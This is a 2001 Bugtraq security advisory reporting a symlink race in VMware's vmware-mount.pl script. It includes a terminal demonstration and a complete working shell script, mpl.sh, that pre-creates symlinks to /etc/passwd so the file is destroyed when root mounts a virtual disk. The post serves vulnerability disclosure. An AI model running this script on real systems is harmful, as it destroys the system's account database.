[20313] in bugtraq
VMware symlink problems
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Thu Apr 19 13:54:38 2001
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <3ADDBB5D.205386BF@starzetz.de>
Date: Wed, 18 Apr 2001 18:05:49 +0200
Reply-To: Paul Starzetz <paul@STARZETZ.DE>
From: Paul Starzetz <paul@STARZETZ.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
1. Problem description
----------------------
There is symlink vulnerability in the vmware-mount.pl script which comes
with lates VMware.
2. Details
----------
While mounting virtual disk drives using the vmware-mount.pl script, a
temporary file named vmware-mount.pl.PID where PID is the current pid of
the command will be created in an insecure manner. This allows an
attacker to overwrite any local file, if root mounts a VMware's virtual
partition (mounting is usually done as root).
Example:
paul@ps:/tmp > id
uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall)
paul@ps:/tmp > ./mpl.sh
VMware local /etc/passwd DoS
By Ihq.
linking /etc/passwd to /tmp
[+] please wait for root to run vmware-mount.pl
after running vmware-mount.pl:
paul@ps:/tmp > id
uid=500 gid=100(users) Gruppen=100(users),90(firewall)
Obviously the passwd file has been overwritten:
paul@ps:/tmp > cat /etc/passwd
Nr Start Size Type Id Sytem
-- ---------- ---------- ---- -- ------------------------
1 63 2096577 BIOS C Win95 FAT32 (LBA)
I'm not sure, if it is exploitable for priviledge elevation.
3. Impact
---------
Local file corruption.
---------------------- mpl.sh ----------------------
#/bin/bash
declare -i n
declare -i mx
n=2
mx=32767
echo
echo "VMware local /etc/passwd DoS"
echo "By Ihq."
echo
echo " linking /etc/passwd to /tmp"
while test $n -lt $mx ; do
ln -s /etc/passwd /tmp/vmware-mount.pl.$n
n=$(($n + 1))
done
echo "[+] please wait for root to run vmware-mount.pl"
echo
